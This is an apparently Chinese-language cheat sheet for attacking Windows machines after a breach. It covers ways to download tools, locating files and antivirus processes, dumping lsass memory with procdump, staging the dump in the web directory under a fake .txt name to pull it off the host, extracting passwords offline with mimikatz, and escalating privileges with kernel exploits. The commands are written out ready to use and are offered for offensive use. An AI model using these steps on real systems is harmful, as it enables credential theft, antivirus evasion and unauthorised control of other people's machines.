一,命令行下载方法
1. powershell下
Invoke-WebRequest
3. ftp
4. 写脚本(马),菜刀连接
5. bitsadmin
6. certutil
二,搜索指定文件路径和 ☞dir
dir /b /s XXXX
cd /d E: && dir /b /s XXXXX 指定在E盘搜索
/b 使用空格式(没有标题信息或摘要)
/s 显示指定目录和所有子目录中的文件
三,查看进程的方法 ☞tasklist
tasklist
/svc :无间断地列出每个过程的所有服务信息
- 寻找杀软
- 寻找可利用的第三方
四,绕过杀软,离线读密码
由于杀软的存在,使得一些类似激活guest,添加用户的命令和mimikatz上传不能正常执行。
【解决】
采用procdump导出lsass.dmp,然后从web下载到本地,再使用mimikatz离线读密码绕过
- procdump是微软官方抓取信息工具
- lsass.exe 是内存文进程, 它用于本地安全和登陆策略,一般在进程管理器中能看到
【将lsass.dmp导出到哪】
目的是离线读,自然是导出到web目录下, 才能下载到本地喽
①用dir找到网站目录
cd /d E: && dir /b /s Logon.aspx|php’
②copy到该目录
copy lsass.dmp “E:\Program Files\Web\tmp.txt”
【步骤】
1. 下载procdump工具
2. 导出lsass.dmp
procdump64.exe -accepteula -ma lsass.exe lsass.dmp
3. 找到web目录,将lsass.dmp 移动到该目录。并下载到本地
4. 使用mimikatz读取密码
mimikatz.exe "sekurlsa::minidump lsass.txt" "sekurlsa::logonPasswords full" exit
五,使用windows-kernel-exploits脚本提权
由SecWiki 大神搞的项目
1. getshell后 systeminfo查看补丁信息
2. 本地使用windows-kernel-exploits,进行匹配
3. 根据匹配的信息在secwiki的项目中找到如何利用的方式。